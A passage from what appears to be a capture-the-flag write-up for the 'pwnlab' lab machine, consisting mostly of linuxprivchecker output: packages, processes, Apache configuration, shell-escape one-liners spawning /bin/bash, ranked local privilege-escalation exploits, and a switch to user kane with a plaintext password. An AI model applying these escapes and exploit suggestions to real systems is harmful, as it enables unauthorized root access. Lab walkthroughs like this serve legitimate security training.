libperl4-corelibs-perl 0.003-1 libraries historically supplied with Perl 4
libpipeline1:i386 1.4.0-1 pipeline manipulation library
libpixman-1-0:i386 0.32.6-3 pixel-manipulation library for X and cairo
libpng12-0:i386 1.2.50-2+deb8u2 PNG library - runtime
libpod-latex-perl 0.61-1 module to convert Pod data to formatted LaTeX
libpod-readme-perl 0.11-1 Perl module to convert POD to README file
libpopt0:i386 1.16-10 lib for parsing cmdline parameters
libprocps3:i386 2:3.3.9-9 library for accessing process information from /proc
libpsl0:i386 0.5.1-1 Library for Public Suffix List (shared libraries)
libpth20:i386 2.0.7-20 GNU Portable Threads
libpython-stdlib:i386 2.7.9-1 interactive high-level object-oriented language (default python version)
libpython2.7-minimal:i386 2.7.9-2 Minimal subset of the Python language (version 2.7)
libpython2.7-stdlib:i386 2.7.9-2 Interactive high-level object-oriented language (standard library, version 2.7)
libqdbm14 1.8.78-5+b1 QDBM Database Libraries without GDBM wrapper[runtime]
libquadmath0:i386 4.9.2-10 GCC Quad-Precision Math Library
libreadline6:i386 6.3-8+b3 GNU readline and history libraries, run-time libraries
libregexp-common-perl 2013031301-1 module with common regular expressions
librtmp1:i386 2.4+20150115.gita107cef-1 toolkit for RTMP streams (shared library)
libsasl2-2:i386 2.1.26.dfsg1-13+deb8u1 Cyrus SASL - authentication abstraction library
libsasl2-modules:i386 2.1.26.dfsg1-13+deb8u1 Cyrus SASL - pluggable authentication modules
libsasl2-modules-db:i386 2.1.26.dfsg1-13+deb8u1 Cyrus SASL - pluggable authentication modules (DB)
libselinux1:i386 2.3-2 SELinux runtime shared libraries
libsemanage-common 2.3-1 Common files for SELinux policy management libraries
libsemanage1:i386 2.3-1+b1 SELinux policy management library
libsepol1:i386 2.3-2 SELinux library for manipulating binary security policies
libsigc++-2.0-0c2a:i386 2.4.0-1 type-safe Signal Framework for C++ - runtime
libsigsegv2:i386 2.10-4+b1 Library for handling page faults in a portable way
libslang2:i386 2.3.0-2 S-Lang programming library - runtime version
libsmartcols1:i386 2.25.2-6 smart column output alignment library
libsoftware-license-perl 0.103010-3 module providing templated software licenses
libsqlite3-0:i386 3.8.7.1-1+deb8u1 SQLite 3 shared library
libss2:i386 1.42.12-1.1 command-line interface parsing library
libssh2-1:i386 1.4.3-4.1+deb8u1 SSH2 client-side library
libssl1.0.0:i386 1.0.1k-3+deb8u4 Secure Sockets Layer toolkit - shared libraries
libstdc++6:i386 4.9.2-10 GNU Standard C++ Library v3
libsub-exporter-perl 0.986-1 sophisticated exporter for custom-built routines
libsub-install-perl 0.928-1 module for installing subroutines into packages easily
libsub-name-perl 0.12-1 module for assigning a new name to referenced sub
libswitch-perl 2.17-2 switch statement for Perl
libsystemd0:i386 215-17+deb8u3 systemd utility library
libtasn1-6:i386 4.2-3+deb8u1 Manage ASN.1 structures (runtime)
libterm-readkey-perl 2.32-1+b1 perl module for simple terminal control
libterm-ui-perl 0.42-1 Term::ReadLine UI made easy
libtext-charwidth-perl 0.04-7+b3 get display widths of characters on the terminal
libtext-iconv-perl 1.7-5+b2 converts between character sets in Perl
libtext-soundex-perl 3.4-1+b2 implementation of the soundex algorithm
libtext-template-perl 1.46-1 perl module to process text templates
libtext-unidecode-perl 1.22-1 Text::Unidecode -- US-ASCII transliterations of Unicode text
libtext-wrapi18n-perl 0.06-7 internationalized substitute of Text::Wrap
libthai-data 0.1.21-1 Data files for Thai language support library
libthai0:i386 0.1.21-1 Thai language support library
libtiff5:i386 4.0.3-12.3+deb8u1 Tag Image File Format (TIFF) library
libtimedate-perl 2.3000-2 collection of modules to manipulate date/time information
libtinfo5:i386 5.9+20140913-1+b1 shared low-level terminfo library for terminal handling
libtirpc1:i386 0.2.5-1 transport-independent RPC library
libtokyocabinet9:i386 1.4.48-3 Tokyo Cabinet Database Libraries [runtime]
libubsan0:i386 4.9.2-10 UBSan -- undefined behaviour sanitizer (runtime)
libudev1:i386 215-17+deb8u3 libudev shared library
liburi-perl 1.64-1 module to manipulate and access URI strings
libusb-0.1-4:i386 2:0.1.12-25 userspace USB programming library
libusb-1.0-0:i386 2:1.0.19-1 userspace USB programming library
libustr-1.0-1:i386 1.0.4-3+b2 Micro string library: shared library
libuuid-perl 0.05-1+b1 Perl extension for using UUID interfaces as defined in e2fsprogs
libuuid1:i386 2.25.2-6 Universally Unique ID library
libwebp5:i386 0.4.1-1.2+b2 Lossy compression of digital photographic images.
libwebpdemux1:i386 0.4.1-1.2+b2 Lossy compression of digital photographic images.
libwebpmux1:i386 0.4.1-1.2+b2 Lossy compression of digital photographic images.
libwrap0:i386 7.6.q-25 Wietse Venema's TCP wrappers library
libwww-perl 6.08-1 simple and consistent interface to the world-wide web
libwww-robotrules-perl 6.01-1 database of robots.txt-derived permissions
libx11-6:i386 2:1.6.2-3 X11 client-side library
libx11-data 2:1.6.2-3 X11 client-side library
libxapian22 1.2.19-1 Search engine library
libxau6:i386 1:1.0.8-1 X11 authorisation library
libxcb-render0:i386 1.10-3+b1 X C Binding, render extension
libxcb-shm0:i386 1.10-3+b1 X C Binding, shm extension
libxcb1:i386 1.10-3+b1 X C Binding
libxcomposite1:i386 1:0.4.4-1 X11 Composite extension library
libxcursor1:i386 1:1.1.14-1+b1 X cursor management library
libxdamage1:i386 1:1.1.4-2+b1 X11 damaged region extension library
libxdmcp6:i386 1:1.1.1-1+b1 X11 Display Manager Control Protocol library
libxext6:i386 2:1.3.3-1 X11 miscellaneous extension library
libxfixes3:i386 1:5.0.1-2+b2 X11 miscellaneous 'fixes' extension library
libxi6:i386 2:1.7.4-1+b2 X11 Input extension library
libxinerama1:i386 2:1.1.3-1+b1 X11 Xinerama extension library
libxml-libxml-perl 2.0116+dfsg-1+deb8u1 Perl interface to the libxml2 library
libxml-namespacesupport-perl 1.11-1 Perl module for supporting simple generic namespaces
libxml-parser-perl 2.41-3 Perl module for parsing XML files
libxml-sax-base-perl 1.07-1 base class for SAX drivers and filters
libxml-sax-expat-perl 0.40-2 Perl module for a SAX2 driver for Expat (XML::Parser)
libxml-sax-perl 0.99+dfsg-2 Perl module for using and building Perl SAX2 XML processors
libxml2:i386 2.9.1+dfsg1-5+deb8u1 GNOME XML library
libxmuu1:i386 2:1.1.2-1 X11 miscellaneous micro-utility library
libxrandr2:i386 2:1.4.2-1+b1 X11 RandR extension library
libxrender1:i386 1:0.9.8-1+b1 X Rendering Extension client library
libxtables10 1.4.21-2+b1 netfilter xtables library
linux-base 3.5 Linux image base package
linux-image-3.16.0-4-686-pae 3.16.7-ckt20-1+deb8u4 Linux 3.16 for modern PCs
linux-image-686-pae 3.16+63 Linux for modern PCs (meta-package)
linux-libc-dev:i386 3.16.7-ckt20-1+deb8u4 Linux support headers for userspace development
locales 2.19-18+deb8u3 GNU C Library: National Language (locale) data [support]
login 1:4.2-3+deb8u1 system login tools
logrotate 3.8.7-1+b1 Log rotation utility
lsb-base 4.1+Debian13+nmu1 Linux Standard Base 4.1 init script functionality
lsb-release 4.1+Debian13+nmu1 Linux Standard Base version reporting utility
lsof 4.86+dfsg-1 Utility to list open files
m4 1.4.17-4 macro processing language
man-db 2.7.0.2-5 on-line manual pager
manpages 3.74-1 Manual pages about using a GNU/Linux system
manpages-dev 3.74-1 Manual pages about using GNU/Linux for development
mawk 1.3.3-17 a pattern scanning and text processing language
mime-support 3.58 MIME files 'mime.types' & 'mailcap', and support programs
mlocate 0.26-1 quickly find files on the filesystem based on their name
mount 2.25.2-6 Tools for mounting and manipulating filesystems
multiarch-support 2.19-18+deb8u3 Transitional package to ensure multiarch compatibility
mutt 1.5.23-3 text-based mailreader supporting MIME, GPG, PGP and threading
mysql-client 5.5.47-0+deb8u1 MySQL database client (metapackage depending on the latest version)
mysql-client-5.5 5.5.47-0+deb8u1 MySQL database client binaries
mysql-common 5.5.47-0+deb8u1 MySQL database common files, e.g. /etc/mysql/my.cnf
mysql-server 5.5.47-0+deb8u1 MySQL database server (metapackage depending on the latest version)
mysql-server-5.5 5.5.47-0+deb8u1 MySQL database server binaries and system database setup
mysql-server-core-5.5 5.5.47-0+deb8u1 MySQL database server binaries
nano 2.2.6-3 small, friendly text editor inspired by Pico
ncurses-base 5.9+20140913-1 basic terminal type definitions
ncurses-bin 5.9+20140913-1+b1 terminal-related programs and man pages
ncurses-term 5.9+20140913-1 additional terminal type definitions
net-tools 1.60-26+b1 NET-3 networking toolkit
netbase 5.3 Basic TCP/IP networking system
netcat-traditional 1.10-41 TCP/IP swiss army knife
nfacct 1.0.1-1.1 netfilter accounting object tool
nfs-common 1:1.2.8-9 NFS support files common to client and server
openssh-client 1:6.7p1-5+deb8u1 secure shell (SSH) client, for secure access to remote machines
openssl 1.0.1k-3+deb8u4 Secure Sockets Layer toolkit - cryptographic utility
os-prober 1.65 utility to detect other OSes on a set of drives
passwd 1:4.2-3+deb8u1 change and administer password and group data
patch 2.7.5-1 Apply a diff file to an original
pciutils 1:3.2.1-3 Linux PCI Utilities
perl 5.20.2-3+deb8u4 Larry Wall's Practical Extraction and Report Language
perl-base 5.20.2-3+deb8u4 minimal Perl system
perl-modules 5.20.2-3+deb8u4 Core Perl modules
php5 5.6.17+dfsg-0+deb8u1 server-side, HTML-embedded scripting language (metapackage)
php5-cli 5.6.17+dfsg-0+deb8u1 command-line interpreter for the php5 scripting language
php5-common 5.6.17+dfsg-0+deb8u1 Common files for packages built from the php5 source
php5-json 1.3.6-1 JSON module for php5
php5-mysql 5.6.17+dfsg-0+deb8u1 MySQL module for php5
php5-readline 5.6.17+dfsg-0+deb8u1 Readline module for php5
pinentry-gtk2 0.8.3-2 GTK+-2-based PIN or pass-phrase entry dialog for GnuPG
procmail 3.22-24 Versatile e-mail processor
procps 2:3.3.9-9 /proc file system utilities
psmisc 22.21-2 utilities that use the proc file system
python 2.7.9-1 interactive high-level object-oriented language (default version)
python-apt 0.9.3.12 Python interface to libapt-pkg
python-apt-common 0.9.3.12 Python interface to libapt-pkg (locales)
python-chardet 2.3.0-1 universal character encoding detector for Python2
python-debian 0.1.27 Python modules to work with Debian-related data formats
python-debianbts 1.12 Python interface to Debian's Bug Tracking System
python-defusedxml 0.4.1-2 XML bomb protection for Python stdlib modules (for Python 2)
python-docutils 0.12+dfsg-1 text processing system for reStructuredText (implemented in Python 2)
python-minimal 2.7.9-1 minimal subset of the Python language (default version)
python-pil:i386 2.6.1-2+deb8u2 Python Imaging Library (Pillow fork)
python-pkg-resources 5.5.1-1 Package Discovery and Resource Access using pkg_resources
python-pygments 2.0.1+dfsg-1.1+deb8u1 syntax highlighting package written in Python
python-reportbug 6.6.3 Python modules for interacting with bug tracking systems
python-roman 2.0.0-1 module for generating/analyzing Roman numerals for Python 2
python-six 1.8.0-1 Python 2 and 3 compatibility library (Python 2 interface)
python-soappy 0.12.22-1 SOAP Support for Python
python-support 1.0.15 automated rebuilding support for Python modules
python-wstools 0.4.3-2 WSDL parsing tools Python module
python2.7 2.7.9-2 Interactive high-level object-oriented language (version 2.7)
python2.7-minimal 2.7.9-2 Minimal subset of the Python language (version 2.7)
readline-common 6.3-8 GNU readline and history libraries, common files
rename 0.20-3 Perl extension for renaming multiple files
reportbug 6.6.3 reports bugs in the Debian distribution
rpcbind 0.2.1-6+deb8u1 converts RPC program numbers into universal addresses
rsyslog 8.4.2-1+deb8u2 reliable system and kernel logging daemon
sed 4.2.2-4+b1 The GNU sed stream editor
sensible-utils 0.0.9 Utilities for sensible alternative selection
sgml-base 1.26+nmu4 SGML infrastructure and SGML catalog file support
shared-mime-info 1.3-1 FreeDesktop.org shared MIME database and spec
ssl-cert 1.0.35 simple debconf wrapper for OpenSSL
startpar 0.59-3 run processes in parallel and multiplex their output
systemd 215-17+deb8u3 system and service manager
systemd-sysv 215-17+deb8u3 system and service manager - SysV links
sysv-rc 2.88dsf-59 System-V-like runlevel change mechanism
sysvinit-utils 2.88dsf-59 System-V-like utilities
tar 1.27.1-2+b1 GNU version of the tar archiving utility
task-english 3.31+deb8u1 General English environment
tasksel 3.31+deb8u1 tool for selecting tasks for installation on Debian systems
tasksel-data 3.31+deb8u1 official tasks used for installation of Debian systems
tcpd 7.6.q-25 Wietse Venema's TCP wrapper utilities
telnet 0.17-36 The telnet client
texinfo 5.2.0.dfsg.1-6 Documentation system for on-line information and printed output
time 1.7-25 GNU time program for measuring CPU resource usage
traceroute 1:2.0.20-2+b1 Traces the route taken by packets over an IPv4/IPv6 network
tzdata 2015g-0+deb8u1 time zone and daylight-saving time data
ucf 3.0030 Update Configuration File(s): preserve user changes to config files
udev 215-17+deb8u3 /dev/ and hotplug management daemon
usbutils 1:007-2 Linux USB utilities
util-linux 2.25.2-6 Miscellaneous system utilities
util-linux-locales 2.25.2-6 Locales files for util-linux
vim-common 2:7.4.488-7 Vi IMproved - Common files
vim-tiny 2:7.4.488-7 Vi IMproved - enhanced vi editor - compact version
w3m 0.5.3-19 WWW browsable pager with excellent tables/frames support
wamerican 7.1-1 American English dictionary words for /usr/share/dict
wget 1.16-1 retrieves files from the web
whiptail 0.52.17-1+b1 Displays user-friendly dialog boxes from shell scripts
whois 5.2.7 intelligent WHOIS client
xauth 1:1.0.9-1 X authentication utility
xdg-user-dirs 0.15-2 tool to manage well known user directories
xkb-data 2.12-1 X Keyboard Extension (XKB) configuration data
xml-core 0.13+nmu2 XML infrastructure and XML catalog file support
xz-utils 5.1.1alpha+20120614-2+b3 XZ-format compression utilities
zlib1g:i386 1:1.2.8.dfsg-2+b1 compression library - runtime
[+] Current processes
USER PID START TIME COMMAND
root 1 14:06 0:01 /sbin/init
root 2 14:06 0:00 [kthreadd]
root 3 14:06 1:06 [ksoftirqd/0]
root 5 14:06 0:00 [kworker/0:0H]
root 7 14:06 0:05 [rcu_sched]
root 8 14:06 0:00 [rcu_bh]
root 9 14:06 0:00 [migration/0]
root 10 14:06 0:01 [watchdog/0]
root 11 14:06 0:00 [khelper]
root 12 14:06 0:00 [kdevtmpfs]
root 13 14:06 0:00 [netns]
root 14 14:06 0:00 [khungtaskd]
root 15 14:06 0:00 [writeback]
root 16 14:06 0:00 [ksmd]
root 17 14:06 0:00 [crypto]
root 18 14:06 0:00 [kintegrityd]
root 19 14:06 0:00 [bioset]
root 20 14:06 0:00 [kblockd]
root 22 14:06 0:00 [kswapd0]
root 23 14:06 0:00 [fsnotify_mark]
root 29 14:06 0:00 [kthrotld]
root 30 14:06 0:00 [ipv6_addrconf]
root 31 14:06 0:00 [deferwq]
root 66 14:06 0:00 [khubd]
root 67 14:06 0:00 [mpt_poll_0]
root 68 14:06 0:00 [mpt/0]
root 69 14:06 0:00 [scsi_eh_0]
root 70 14:06 0:00 [scsi_tmf_0]
root 71 14:06 0:02 [kworker/u2:2]
root 74 14:06 0:00 [kworker/0:1H]
root 95 14:06 0:00 [jbd2/sda1-8]
root 96 14:06 0:00 [ext4-rsv-conver]
root 126 14:06 0:00 [kauditd]
root 127 14:06 0:00 /lib/systemd/systemd-journald
root 136 14:06 0:00 /lib/systemd/systemd-udevd
root 169 14:06 0:00 [kpsmoused]
root 222 14:06 0:00 [kworker/0:4]
root 344 14:06 0:00 /sbin/rpcbind
statd 368 14:06 0:00 /sbin/rpc.statd
root 373 14:06 0:00 [rpciod]
root 375 14:06 0:00 [nfsiod]
root 382 14:06 0:00 /usr/sbin/rpc.idmapd
root 383 14:06 0:00 /usr/sbin/cron
daemon 384 14:06 0:00 /usr/sbin/atd
root 386 14:06 0:00 /lib/systemd/systemd-logind
message+ 389 14:06 0:00 /usr/bin/dbus-daemon
root 407 14:06 0:00 /usr/sbin/rsyslogd
root 409 14:06 0:00 /usr/sbin/acpid
root 419 14:06 0:00 /sbin/agetty
root 441 14:06 0:00 /bin/sh
root 482 14:06 0:04 /usr/sbin/apache2
www-data 650 14:06 0:40 /usr/sbin/apache2
www-data 651 14:06 0:39 /usr/sbin/apache2
www-data 652 14:06 0:39 /usr/sbin/apache2
www-data 653 14:06 0:39 /usr/sbin/apache2
mysql 790 14:06 0:33 /usr/sbin/mysqld
www-data 1124 16:46 0:00 sh
www-data 1125 16:46 0:00 /bin/sh
www-data 1126 16:47 0:00 python
www-data 1127 16:47 0:00 /bin/bash
www-data 1132 16:48 0:00 python
Debian-+ 1140 14:06 0:00 /usr/sbin/exim4
root 1198 14:06 0:00 dhclient
www-data 1213 14:07 0:40 /usr/sbin/apache2
root 1244 14:21 0:25 [kworker/0:0]
www-data 1251 14:29 0:40 /usr/sbin/apache2
www-data 1253 14:29 0:39 /usr/sbin/apache2
www-data 1255 14:29 0:39 /usr/sbin/apache2
www-data 1257 14:29 0:39 /usr/sbin/apache2
www-data 1259 14:29 0:40 /usr/sbin/apache2
root 1267 14:34 0:02 [kworker/u2:0]
www-data 1312 16:49 0:00 /bin/sh
www-data 1313 16:49 0:00 ps
www-data 1314 16:49 0:00 awk
[+] Apache Version and Modules
Server version: Apache/2.4.10 (Debian)
Server built: Jan 3 2016 03:50:53
Loaded Modules:
core_module (static)
so_module (static)
watchdog_module (static)
http_module (static)
log_config_module (static)
logio_module (static)
version_module (static)
unixd_module (static)
access_compat_module (shared)
alias_module (shared)
auth_basic_module (shared)
authn_core_module (shared)
authn_file_module (shared)
authz_core_module (shared)
authz_host_module (shared)
authz_user_module (shared)
autoindex_module (shared)
deflate_module (shared)
dir_module (shared)
env_module (shared)
filter_module (shared)
mime_module (shared)
mpm_prefork_module (shared)
negotiation_module (shared)
php5_module (shared)
setenvif_module (shared)
status_module (shared)
Compiled in modules:
core.c
mod_so.c
mod_watchdog.c
http_core.c
mod_log_config.c
mod_logio.c
mod_version.c
mod_unixd.c
[+] Apache Config File
# This is the main Apache server configuration file. It contains the
# configuration directives that give the server its instructions.
# See http://httpd.apache.org/docs/2.4/ for detailed information about
# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
# hints.
#
#
# Summary of how the Apache 2 configuration works in Debian:
# The Apache 2 web server configuration in Debian is quite different to
# upstream's suggested way to configure the web server. This is because Debian's
# default Apache2 installation attempts to make adding and removing modules,
# virtual hosts, and extra configuration directives as flexible as possible, in
# order to make automating the changes and administering the server as easy as
# possible.
# It is split into several files forming the configuration hierarchy outlined
# below, all located in the /etc/apache2/ directory:
#
# /etc/apache2/
# |-- apache2.conf
# | `-- ports.conf
# |-- mods-enabled
# | |-- *.load
# | `-- *.conf
# |-- conf-enabled
# | `-- *.conf
# `-- sites-enabled
# `-- *.conf
#
#
# * apache2.conf is the main configuration file (this file). It puts the pieces
# together by including all remaining configuration files when starting up the
# web server.
#
# * ports.conf is always included from the main configuration file. It is
# supposed to determine listening ports for incoming connections which can be
# customized anytime.
#
# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
# directories contain particular configuration snippets which manage modules,
# global configuration fragments, or virtual host configurations,
# respectively.
#
# They are activated by symlinking available configuration files from their
# respective *-available/ counterparts. These should be managed by using our
# helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
# their respective man pages for detailed information.
#
# * The binary is called apache2. Due to the use of environment variables, in
# the default configuration, apache2 needs to be started/stopped with
# /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
# work with the default configuration.
# Global configuration
#
#
# ServerRoot: The top of the directory tree under which the server's
# configuration, error, and log files are kept.
#
# NOTE! If you intend to place this on an NFS (or otherwise network)
# mounted filesystem then please read the Mutex documentation (available
# at );
# you will save yourself a lot of trouble.
#
# Do NOT add a slash at the end of the directory path.
#
#ServerRoot "/etc/apache2"
#
# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
#
Mutex file:${APACHE_LOCK_DIR} default
#
# PidFile: The file in which the server should record its process
# identification number when it starts.
# This needs to be set in /etc/apache2/envvars
#
PidFile ${APACHE_PID_FILE}
#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300
#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On
#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100
#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 5
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a
# container, error messages relating to that virtual host will be
# logged here. If you *do* define an error logfile for a
# container, that host's errors will be logged there and not here.
#
ErrorLog ${APACHE_LOG_DIR}/error.log
#
# LogLevel: Control the severity of messages logged to the error_log.
# Available values: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the log level for particular modules, e.g.
# "LogLevel info ssl:warn"
#
LogLevel warn
# Include module configuration:
IncludeOptional mods-enabled/*.load
IncludeOptional mods-enabled/*.conf
# Include list of ports to listen on
Include ports.conf
# Sets the default security model of the Apache2 HTTPD server. It does
# not allow access to the root filesystem outside of /usr/share and /var/www.
# The former is used by web applications packaged in Debian,
# the latter may be used for local directories served by the web server. If
# your system is serving content from a sub-directory in /srv you must allow
# access here, or in any related virtual host.
AllowOverride None
Require all granted
Require all denied
#
# The following directives define some format nicknames for use with
# a CustomLog directive.
#
# These deviate from the Common Log Format definitions in that they use %O
# (the actual bytes sent including headers) instead of %b (the size of the
# requested file), because the latter makes it impossible to detect partial
# requests.
#
# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
# Use mod_remoteip instead.
#
LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent
# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.
# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf
# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf
# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
[+] Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
root 22 14:06 0:00 [kswapd0]
root 14 14:06 0:00 [khungtaskd]
root 19 14:06 0:00 [bioset]
root 386 14:06 0:00 /lib/systemd/systemd-logind
root 67 14:06 0:00 [mpt_poll_0]
root 13 14:06 0:00 [netns]
root 136 14:06 0:00 /lib/systemd/systemd-udevd
root 29 14:06 0:00 [kthrotld]
root 68 14:06 0:00 [mpt/0]
root 16 14:06 0:00 [ksmd]
root 3 14:06 1:06 [ksoftirqd/0]
root 1 14:06 0:01 /sbin/init
Possible Related Packages:
init 1.22 System-V-like init utilities - metapackage
init-system-helpers 1.22 helper tools for all init systems
initramfs-tools 0.120 generic modular initramfs generator
initscripts 2.88dsf-59 scripts for initializing and shutting down the system
insserv 1.14.0-5 boot sequence organizer using LSB init.d script dependency information
libklibc 2.0.4-2 minimal libc subset for use with initramfs
lsb-base 4.1+Debian13+nmu1 Linux Standard Base 4.1 init script functionality
ncurses-base 5.9+20140913-1 basic terminal type definitions
ncurses-term 5.9+20140913-1 additional terminal type definitions
sysvinit-utils 2.88dsf-59 System-V-like utilities
root 74 14:06 0:00 [kworker/0:1H]
root 31 14:06 0:00 [deferwq]
root 8 14:06 0:00 [rcu_bh]
root 70 14:06 0:00 [scsi_tmf_0]
root 2 14:06 0:00 [kthreadd]
root 1198 14:06 0:00 dhclient
root 10 14:06 0:01 [watchdog/0]
root 71 14:06 0:02 [kworker/u2:2]
root 23 14:06 0:00 [fsnotify_mark]
root 69 14:06 0:00 [scsi_eh_0]
root 409 14:06 0:00 /usr/sbin/acpid
Possible Related Packages:
acpid 1:2.0.23-2 Advanced Configuration and Power Interface event daemon
root 383 14:06 0:00 /usr/sbin/cron
Possible Related Packages:
cron 3.0pl1-127+deb8u1 process scheduling daemon
root 126 14:06 0:00 [kauditd]
root 382 14:06 0:00 /usr/sbin/rpc.idmapd
root 407 14:06 0:00 /usr/sbin/rsyslogd
root 12 14:06 0:00 [kdevtmpfs]
root 30 14:06 0:00 [ipv6_addrconf]
root 373 14:06 0:00 [rpciod]
root 17 14:06 0:00 [crypto]
root 222 14:06 0:00 [kworker/0:4]
root 482 14:06 0:04 /usr/sbin/apache2
Possible Related Packages:
apache2 2.4.10-10+deb8u4 Apache HTTP Server
apache2-bin 2.4.10-10+deb8u4 Apache HTTP Server (modules and other binary files)
apache2-data 2.4.10-10+deb8u4 Apache HTTP Server (common files)
apache2-utils 2.4.10-10+deb8u4 Apache HTTP Server (utility programs for web servers)
libapache2-mod-php5 5.6.17+dfsg-0+deb8u1 server-side, HTML-embedded scripting language (Apache 2 module)
root 7 14:06 0:05 [rcu_sched]
root 66 14:06 0:00 [khubd]
root 96 14:06 0:00 [ext4-rsv-conver]
root 1244 14:21 0:25 [kworker/0:0]
root 169 14:06 0:00 [kpsmoused]
root 15 14:06 0:00 [writeback]
root 18 14:06 0:00 [kintegrityd]
root 5 14:06 0:00 [kworker/0:0H]
root 95 14:06 0:00 [jbd2/sda1-8]
root 375 14:06 0:00 [nfsiod]
root 9 14:06 0:00 [migration/0]
root 127 14:06 0:00 /lib/systemd/systemd-journald
root 20 14:06 0:00 [kblockd]
root 1267 14:34 0:02 [kworker/u2:0]
root 441 14:06 0:00 /bin/sh
root 11 14:06 0:00 [khelper]
root 344 14:06 0:00 /sbin/rpcbind
Possible Related Packages:
rpcbind 0.2.1-6+deb8u1 converts RPC program numbers into universal addresses
root 419 14:06 0:00 /sbin/agetty
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
/usr/bin/awk
/usr/bin/perl
/usr/bin/python
/usr/bin/gcc
/usr/bin/cc
/usr/bin/vi
/usr/bin/find
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/ftp
[+] Related Shell Escape Sequences...
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || http://www.exploit-db.com/exploits/5720 || Language=python
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
Finished
=================================================================================================
There's nothing using www-data user. I switched to kane's user and i did the same:
www-data@pwnlab:/var/www/html$ su kane
su kane
Password: iSv5Ym2GRo
kane@pwnlab:/var/www/html$ cd upload;ls
cd upload;ls
f8c3fc737f057212414e67a22be29837.png linuxprivchecker.py
kane@pwnlab:/var/www/html/upload$ python ./linuxprivchecker.py
python ./linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 3.16.0-4-686-pae (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29)
[+] Hostname
pwnlab
[+] Operating System
Debian GNU/Linux 8 \n \l
[*] GETTING NETWORKING INFO...
[+] Interfaces
eth0 Link encap:Ethernet HWaddr 08:00:27:0d:33:06
inet addr:192.168.43.4 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe0d:3306/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:332630 errors:127 dropped:0 overruns:0 frame:0
TX packets:370327 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:64942748 (61.9 MiB) TX bytes:122876342 (117.1 MiB)
Interrupt:9 Base address:0xd000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:115 errors:0 dropped:0 overruns:0 frame:0
TX packets:115 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:11328 (11.0 KiB) TX bytes:11328 (11.0 KiB)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:57126 0.0.0.0:* LISTEN -
